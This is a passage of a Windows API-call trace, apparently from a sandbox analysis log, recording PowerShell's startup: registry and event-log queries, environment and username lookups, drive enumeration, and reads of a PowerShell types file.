	[0120.711] RegEnumKeyExW (in: hKey=0x690, dwIndex=0x2, lpName=0x2ad2069b2e0, lpcchName=0xd7edd8aa98, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xd7edd8aa98, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0120.711] CoTaskMemFree (pv=0x2ad2069b2e0) 
	[0120.711] CoTaskMemFree (pv=0x0) 
	[0120.711] CoTaskMemAlloc (cb=0x204) returned 0x2ad2069dc20
	[0120.711] RegEnumKeyExW (in: hKey=0x690, dwIndex=0x3, lpName=0x2ad2069dc20, lpcchName=0xd7edd8aa98, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xd7edd8aa98, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0120.711] CoTaskMemFree (pv=0x2ad2069dc20) 
	[0120.711] CoTaskMemFree (pv=0x0) 
	[0120.711] CoTaskMemAlloc (cb=0x204) returned 0x2ad2069dc20
	[0120.711] RegEnumKeyExW (in: hKey=0x690, dwIndex=0x4, lpName=0x2ad2069dc20, lpcchName=0xd7edd8aa98, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xd7edd8aa98, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0120.711] CoTaskMemFree (pv=0x2ad2069dc20) 
	[0120.711] CoTaskMemFree (pv=0x0) 
	[0120.712] CoTaskMemAlloc (cb=0x204) returned 0x2ad2069dc20
	[0120.712] RegEnumKeyExW (in: hKey=0x690, dwIndex=0x5, lpName=0x2ad2069dc20, lpcchName=0xd7edd8aa98, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xd7edd8aa98, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0120.712] CoTaskMemFree (pv=0x2ad2069dc20) 
	[0120.712] CoTaskMemFree (pv=0x0) 
	[0120.712] CoTaskMemAlloc (cb=0x204) returned 0x2ad2069b2e0
	[0120.712] RegEnumKeyExW (in: hKey=0x690, dwIndex=0x6, lpName=0x2ad2069b2e0, lpcchName=0xd7edd8aa98, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xd7edd8aa98, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0120.712] CoTaskMemFree (pv=0x2ad2069b2e0) 
	[0120.712] CoTaskMemFree (pv=0x0) 
	[0120.712] CoTaskMemAlloc (cb=0x204) returned 0x2ad2069b4f0
	[0120.712] RegEnumKeyExW (in: hKey=0x690, dwIndex=0x7, lpName=0x2ad2069b4f0, lpcchName=0xd7edd8aa98, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xd7edd8aa98, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0120.712] CoTaskMemFree (pv=0x2ad2069b4f0) 
	[0120.712] CoTaskMemFree (pv=0x0) 
	[0120.712] RegOpenKeyExW (in: hKey=0x690, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7edd8aaf8 | out: phkResult=0xd7edd8aaf8*=0x678) returned 0x0
	[0120.712] RegOpenKeyExW (in: hKey=0x678, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7edd8aaf8 | out: phkResult=0xd7edd8aaf8*=0x0) returned 0x2
	[0120.713] RegOpenKeyExW (in: hKey=0x690, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7edd8aaf8 | out: phkResult=0xd7edd8aaf8*=0x694) returned 0x0
	[0120.713] RegOpenKeyExW (in: hKey=0x694, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7edd8aaf8 | out: phkResult=0xd7edd8aaf8*=0x0) returned 0x2
	[0120.713] RegOpenKeyExW (in: hKey=0x690, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7edd8aaf8 | out: phkResult=0xd7edd8aaf8*=0x698) returned 0x0
	[0120.713] RegOpenKeyExW (in: hKey=0x698, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7edd8aaf8 | out: phkResult=0xd7edd8aaf8*=0x0) returned 0x2
	[0120.713] RegOpenKeyExW (in: hKey=0x690, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7edd8aaf8 | out: phkResult=0xd7edd8aaf8*=0x69c) returned 0x0
	[0120.713] RegOpenKeyExW (in: hKey=0x69c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7edd8aaf8 | out: phkResult=0xd7edd8aaf8*=0x0) returned 0x2
	[0120.714] RegOpenKeyExW (in: hKey=0x690, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7edd8aaf8 | out: phkResult=0xd7edd8aaf8*=0x6a0) returned 0x0
	[0120.714] RegOpenKeyExW (in: hKey=0x6a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7edd8aaf8 | out: phkResult=0xd7edd8aaf8*=0x0) returned 0x2
	[0120.714] RegOpenKeyExW (in: hKey=0x690, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7edd8aaf8 | out: phkResult=0xd7edd8aaf8*=0x0) returned 0x5
	[0120.716] RegOpenKeyExW (in: hKey=0x690, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7edd8aaf8 | out: phkResult=0xd7edd8aaf8*=0x6a4) returned 0x0
	[0120.717] RegOpenKeyExW (in: hKey=0x6a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7edd8aaf8 | out: phkResult=0xd7edd8aaf8*=0x0) returned 0x2
	[0120.717] RegOpenKeyExW (in: hKey=0x690, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7edd8aaf8 | out: phkResult=0xd7edd8aaf8*=0x6a8) returned 0x0
	[0120.717] RegOpenKeyExW (in: hKey=0x6a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7edd8aaf8 | out: phkResult=0xd7edd8aaf8*=0x6ac) returned 0x0
	[0120.717] RegCloseKey (hKey=0x6ac) returned 0x0
	[0120.717] RegCloseKey (hKey=0x690) returned 0x0
	[0120.717] RegCloseKey (hKey=0x6a8) returned 0x0
	[0120.721] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x2ad22b60018
	[0120.724] ReportEventW (hEventLog=0x2ad22b60018, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ad23489f10*="WSMan", lpRawData=0x2ad23489c80) returned 1
	[0120.726] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d55500
	[0120.726] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d55500, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0120.726] CoTaskMemFree (pv=0x2ad22d55500) 
	[0120.727] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x2ad205d0860, nSize=0xd7edd8ad88 | out: lpNameBuffer="X2VS1CUM\\Nd9E1FYi", nSize=0xd7edd8ad88) returned 0x1
	[0120.727] CoTaskMemFree (pv=0x2ad205d0860) 
	[0120.727] CoTaskMemAlloc (cb=0x204) returned 0x2ad2069b4f0
	[0120.727] GetUserNameW (in: lpBuffer=0x2ad2069b4f0, pcbBuffer=0xd7edd8adc8 | out: lpBuffer="Nd9E1FYi", pcbBuffer=0xd7edd8adc8) returned 1
	[0120.728] CoTaskMemFree (pv=0x2ad2069b4f0) 
	[0120.728] ReportEventW (hEventLog=0x2ad22b60018, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ad2348f528*="Alias", lpRawData=0x2ad2348f2b8) returned 1
	[0120.728] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d55a50
	[0120.728] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d55a50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0120.728] CoTaskMemFree (pv=0x2ad22d55a50) 
	[0120.729] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x2ad205d0860, nSize=0xd7edd8ad88 | out: lpNameBuffer="X2VS1CUM\\Nd9E1FYi", nSize=0xd7edd8ad88) returned 0x1
	[0120.730] CoTaskMemFree (pv=0x2ad205d0860) 
	[0120.730] CoTaskMemAlloc (cb=0x204) returned 0x2ad2069de30
	[0120.730] GetUserNameW (in: lpBuffer=0x2ad2069de30, pcbBuffer=0xd7edd8adc8 | out: lpBuffer="Nd9E1FYi", pcbBuffer=0xd7edd8adc8) returned 1
	[0120.730] CoTaskMemFree (pv=0x2ad2069de30) 
	[0120.730] ReportEventW (hEventLog=0x2ad22b60018, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ad23494c00*="Environment", lpRawData=0x2ad23494990) returned 1
	[0120.731] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d55940
	[0120.731] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d55940, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0120.731] CoTaskMemFree (pv=0x2ad22d55940) 
	[0120.731] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d55e90
	[0120.731] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x2ad22d55e90, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0120.731] CoTaskMemFree (pv=0x2ad22d55e90) 
	[0120.731] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d552e0
	[0120.731] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x2ad22d552e0, nSize=0x80 | out: lpBuffer="\\Users\\Nd9E1FYi") returned 0xf
	[0120.731] CoTaskMemFree (pv=0x2ad22d552e0) 
	[0120.731] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi", nBufferLength=0x105, lpBuffer=0xd7edd8a930, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi", lpFilePart=0x0) returned 0x11
	[0120.732] SetErrorMode (uMode=0x1) returned 0x8001
	[0120.732] GetFileAttributesExW (in: lpFileName="C:\\Users\\Nd9E1FYi" (normalized: "c:\\users\\nd9e1fyi"), fInfoLevelId=0x0, lpFileInformation=0xd7edd8ab40 | out: lpFileInformation=0xd7edd8ab40*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1f5eb76f, ftCreationTime.dwHighDateTime=0x1d30b90, ftLastAccessTime.dwLowDateTime=0x78452c50, ftLastAccessTime.dwHighDateTime=0x1d31d78, ftLastWriteTime.dwLowDateTime=0x78452c50, ftLastWriteTime.dwHighDateTime=0x1d31d78, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0120.732] SetErrorMode (uMode=0x8001) returned 0x1
	[0120.732] GetLogicalDrives () returned 0x2000004
	[0120.733] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xd7edd8a6a0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0120.733] GetFullPathNameW (in: lpFileName="Z:\\.", nBufferLength=0x105, lpBuffer=0xd7edd8a6a0, lpFilePart=0x0 | out: lpBuffer="Z:\\", lpFilePart=0x0) returned 0x3
	[0120.734] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0120.734] SetErrorMode (uMode=0x1) returned 0x8001
	[0120.734] CoTaskMemAlloc (cb=0x68) returned 0x2ad22d5c5e0
	[0120.734] CoTaskMemAlloc (cb=0x68) returned 0x2ad22d5cce0
	[0120.734] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2ad22d5c5e0, nVolumeNameSize=0x32, lpVolumeSerialNumber=0xd7edd8ab10, lpMaximumComponentLength=0xd7edd8ab0c, lpFileSystemFlags=0xd7edd8ab08, lpFileSystemNameBuffer=0x2ad22d5cce0, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xd7edd8ab10*=0xa283c81, lpMaximumComponentLength=0xd7edd8ab0c*=0xff, lpFileSystemFlags=0xd7edd8ab08*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0120.734] CoTaskMemFree (pv=0x2ad22d5c5e0) 
	[0120.734] CoTaskMemFree (pv=0x2ad22d5cce0) 
	[0120.734] SetErrorMode (uMode=0x8001) returned 0x1
	[0120.735] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0120.735] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xd7edd8a850, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0120.736] SetErrorMode (uMode=0x1) returned 0x8001
	[0120.736] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xd7edd8aab0 | out: lpFileInformation=0xd7edd8aab0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x31b3b9e4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x95a116d6, ftLastAccessTime.dwHighDateTime=0x1d3a57f, ftLastWriteTime.dwLowDateTime=0x95a116d6, ftLastWriteTime.dwHighDateTime=0x1d3a57f, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0120.736] SetErrorMode (uMode=0x8001) returned 0x1
	[0120.736] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xd7edd8a850, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0120.736] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xd7edd8a700, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0120.736] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0120.736] GetDriveTypeW (lpRootPathName="Z:\\") returned 0x4
	[0120.736] GetDriveTypeW (lpRootPathName="Z:\\") returned 0x4
	[0120.736] GetDriveTypeW (lpRootPathName="Z:\\") returned 0x4
	[0120.737] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xd7edd8a630, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0120.737] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0120.737] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xd7edd8a680, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0120.738] SetErrorMode (uMode=0x1) returned 0x8001
	[0120.738] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xd7edd8a8e0 | out: lpFileInformation=0xd7edd8a8e0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x31b3b9e4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x95a116d6, ftLastAccessTime.dwHighDateTime=0x1d3a57f, ftLastWriteTime.dwLowDateTime=0x95a116d6, ftLastWriteTime.dwHighDateTime=0x1d3a57f, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0120.738] SetErrorMode (uMode=0x8001) returned 0x1
	[0120.738] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xd7edd8a680, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0120.738] SetErrorMode (uMode=0x1) returned 0x8001
	[0120.738] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xd7edd8a8e0 | out: lpFileInformation=0xd7edd8a8e0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x31b3b9e4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x95a116d6, ftLastAccessTime.dwHighDateTime=0x1d3a57f, ftLastWriteTime.dwLowDateTime=0x95a116d6, ftLastWriteTime.dwHighDateTime=0x1d3a57f, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0120.738] SetErrorMode (uMode=0x8001) returned 0x1
	[0120.738] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xd7edd8a720, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0120.738] SetErrorMode (uMode=0x1) returned 0x8001
	[0120.738] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xd7edd8a980 | out: lpFileInformation=0xd7edd8a980*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x31b3b9e4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x95a116d6, ftLastAccessTime.dwHighDateTime=0x1d3a57f, ftLastWriteTime.dwLowDateTime=0x95a116d6, ftLastWriteTime.dwHighDateTime=0x1d3a57f, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0120.738] SetErrorMode (uMode=0x8001) returned 0x1
	[0120.738] GetFullPathNameW (in: lpFileName="Z:\\.", nBufferLength=0x105, lpBuffer=0xd7edd8a630, lpFilePart=0x0 | out: lpBuffer="Z:\\", lpFilePart=0x0) returned 0x3
	[0120.738] GetDriveTypeW (lpRootPathName="Z:\\") returned 0x4
	[0120.739] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x2ad205d0860, nSize=0xd7edd8ad88 | out: lpNameBuffer="X2VS1CUM\\Nd9E1FYi", nSize=0xd7edd8ad88) returned 0x1
	[0120.739] CoTaskMemFree (pv=0x2ad205d0860) 
	[0120.739] CoTaskMemAlloc (cb=0x204) returned 0x2ad2069dc20
	[0120.739] GetUserNameW (in: lpBuffer=0x2ad2069dc20, pcbBuffer=0xd7edd8adc8 | out: lpBuffer="Nd9E1FYi", pcbBuffer=0xd7edd8adc8) returned 1
	[0120.739] CoTaskMemFree (pv=0x2ad2069dc20) 
	[0120.739] ReportEventW (hEventLog=0x2ad22b60018, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ad2349cb48*="FileSystem", lpRawData=0x2ad2349c8d8) returned 1
	[0120.740] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d55c70
	[0120.740] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d55c70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0120.740] CoTaskMemFree (pv=0x2ad22d55c70) 
	[0120.741] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x2ad205d0860, nSize=0xd7edd8ad88 | out: lpNameBuffer="X2VS1CUM\\Nd9E1FYi", nSize=0xd7edd8ad88) returned 0x1
	[0120.741] CoTaskMemFree (pv=0x2ad205d0860) 
	[0120.741] CoTaskMemAlloc (cb=0x204) returned 0x2ad2069e460
	[0120.741] GetUserNameW (in: lpBuffer=0x2ad2069e460, pcbBuffer=0xd7edd8adc8 | out: lpBuffer="Nd9E1FYi", pcbBuffer=0xd7edd8adc8) returned 1
	[0120.741] CoTaskMemFree (pv=0x2ad2069e460) 
	[0120.741] ReportEventW (hEventLog=0x2ad22b60018, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ad234a2468*="Function", lpRawData=0x2ad234a21f8) returned 1
	[0120.742] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d560b0
	[0120.742] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d560b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0120.742] CoTaskMemFree (pv=0x2ad22d560b0) 
	[0120.871] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x2ad205d0860, nSize=0xd7edd8ad88 | out: lpNameBuffer="X2VS1CUM\\Nd9E1FYi", nSize=0xd7edd8ad88) returned 0x1
	[0120.871] CoTaskMemFree (pv=0x2ad205d0860) 
	[0120.871] CoTaskMemAlloc (cb=0x204) returned 0x2ad2069b910
	[0120.871] GetUserNameW (in: lpBuffer=0x2ad2069b910, pcbBuffer=0xd7edd8adc8 | out: lpBuffer="Nd9E1FYi", pcbBuffer=0xd7edd8adc8) returned 1
	[0120.871] CoTaskMemFree (pv=0x2ad2069b910) 
	[0120.871] ReportEventW (hEventLog=0x2ad22b60018, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ad234c4d60*="Registry", lpRawData=0x2ad234c4af0) returned 1
	[0120.873] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x2ad205d0860, nSize=0xd7edd8ad88 | out: lpNameBuffer="X2VS1CUM\\Nd9E1FYi", nSize=0xd7edd8ad88) returned 0x1
	[0120.873] CoTaskMemFree (pv=0x2ad205d0860) 
	[0120.873] CoTaskMemAlloc (cb=0x204) returned 0x2ad2069dc20
	[0120.873] GetUserNameW (in: lpBuffer=0x2ad2069dc20, pcbBuffer=0xd7edd8adc8 | out: lpBuffer="Nd9E1FYi", pcbBuffer=0xd7edd8adc8) returned 1
	[0120.873] CoTaskMemFree (pv=0x2ad2069dc20) 
	[0120.873] ReportEventW (hEventLog=0x2ad22b60018, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ad234ca258*="Variable", lpRawData=0x2ad234c9fe8) returned 1
	[0120.874] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d55c70
	[0120.874] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d55c70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0120.874] CoTaskMemFree (pv=0x2ad22d55c70) 
	[0120.875] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d54a60
	[0120.875] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d54a60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0120.875] CoTaskMemFree (pv=0x2ad22d54a60) 
	[0120.894] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x2ad205d0860, nSize=0xd7edd8ad88 | out: lpNameBuffer="X2VS1CUM\\Nd9E1FYi", nSize=0xd7edd8ad88) returned 0x1
	[0120.894] CoTaskMemFree (pv=0x2ad205d0860) 
	[0120.894] CoTaskMemAlloc (cb=0x204) returned 0x2ad2069dc20
	[0120.894] GetUserNameW (in: lpBuffer=0x2ad2069dc20, pcbBuffer=0xd7edd8adc8 | out: lpBuffer="Nd9E1FYi", pcbBuffer=0xd7edd8adc8) returned 1
	[0120.894] CoTaskMemFree (pv=0x2ad2069dc20) 
	[0120.895] ReportEventW (hEventLog=0x2ad22b60018, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ad234de200*="Certificate", lpRawData=0x2ad234ddf90) returned 1
	[0120.896] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d54400
	[0120.896] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d54400, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0120.896] CoTaskMemFree (pv=0x2ad22d54400) 
	[0120.897] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d54620
	[0120.897] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d54620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0120.897] CoTaskMemFree (pv=0x2ad22d54620) 
	[0120.897] GetACP () returned 0x4e4
	[0120.903] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xd7edd8a5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0120.903] SetErrorMode (uMode=0x1) returned 0x8001
	[0120.904] GetFileType (hFile=0x6ac) returned 0x1
	[0120.904] SetErrorMode (uMode=0x8001) returned 0x1
	[0120.904] GetFileType (hFile=0x6ac) returned 0x1
	[0120.906] ReadFile (in: hFile=0x6ac, lpBuffer=0x2ad234ea5b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8ab78, lpOverlapped=0x0 | out: lpBuffer=0x2ad234ea5b8*, lpNumberOfBytesRead=0xd7edd8ab78*=0x1000, lpOverlapped=0x0) returned 1
	[0120.915] ReadFile (in: hFile=0x6ac, lpBuffer=0x2ad234ea5b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8ab78, lpOverlapped=0x0 | out: lpBuffer=0x2ad234ea5b8*, lpNumberOfBytesRead=0xd7edd8ab78*=0x1000, lpOverlapped=0x0) returned 1
	[0120.915] ReadFile (in: hFile=0x6ac, lpBuffer=0x2ad234ea5b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8ab78, lpOverlapped=0x0 | out: lpBuffer=0x2ad234ea5b8*, lpNumberOfBytesRead=0xd7edd8ab78*=0x3cc, lpOverlapped=0x0) returned 1
	[0120.915] ReadFile (in: hFile=0x6ac, lpBuffer=0x2ad234ea5b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8ab78, lpOverlapped=0x0 | out: lpBuffer=0x2ad234ea5b8*, lpNumberOfBytesRead=0xd7edd8ab78*=0x0, lpOverlapped=0x0) returned 1
	[0120.917] CloseHandle (hObject=0x6ac) returned 1
	[0120.925] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x7ffbf38c3a80, dwSize=0x8) returned 1
	[0120.939] VirtualQuery (in: lpAddress=0xedd898c0, lpBuffer=0xd7edd8a780, dwLength=0x30 | out: lpBuffer=0xd7edd8a780*(BaseAddress=0xedd89000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0xd6fff87000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0120.942] ReadFile (in: hFile=0x6ac, lpBuffer=0x2ad2353eba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8ab78, lpOverlapped=0x0 | out: lpBuffer=0x2ad2353eba0*, lpNumberOfBytesRead=0xd7edd8ab78*=0x1000, lpOverlapped=0x0) returned 1
	[0120.942] ReadFile (in: hFile=0x6ac, lpBuffer=0x2ad2353eba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8ab78, lpOverlapped=0x0 | out: lpBuffer=0x2ad2353eba0*, lpNumberOfBytesRead=0xd7edd8ab78*=0x1000, lpOverlapped=0x0) returned 1
	[0120.942] ReadFile (in: hFile=0x6ac, lpBuffer=0x2ad2353eba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8ab78, lpOverlapped=0x0 | out: lpBuffer=0x2ad2353eba0*, lpNumberOfBytesRead=0xd7edd8ab78*=0x1000, lpOverlapped=0x0) returned 1
	[0120.943] ReadFile (in: hFile=0x6ac, lpBuffer=0x2ad2353eba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8ab78, lpOverlapped=0x0 | out: lpBuffer=0x2ad2353eba0*, lpNumberOfBytesRead=0xd7edd8ab78*=0x1000, lpOverlapped=0x0) returned 1
	[0120.943] ReadFile (in: hFile=0x6ac, lpBuffer=0x2ad2353eba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8ab78, lpOverlapped=0x0 | out: lpBuffer=0x2ad2353eba0*, lpNumberOfBytesRead=0xd7edd8ab78*=0x1000, lpOverlapped=0x0) returned 1
	[0120.943] ReadFile (in: hFile=0x6ac, lpBuffer=0x2ad2353eba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8ab78, lpOverlapped=0x0 | out: lpBuffer=0x2ad2353eba0*, lpNumberOfBytesRead=0xd7edd8ab78*=0x1000, lpOverlapped=0x0) returned 1
	[0120.943] ReadFile (in: hFile=0x6ac, lpBuffer=0x2ad2353eba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8ab78, lpOverlapped=0x0 | out: lpBuffer=0x2ad2353eba0*, lpNumberOfBytesRead=0xd7edd8ab78*=0x1000, lpOverlapped=0x0) returned 1
	[0120.944] ReadFile (in: hFile=0x6ac, lpBuffer=0x2ad2353eba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8ab78, lpOverlapped=0x0 | out: lpBuffer=0x2ad2353eba0*, lpNumberOfBytesRead=0xd7edd8ab78*=0x1000, lpOverlapped=0x0) returned 1
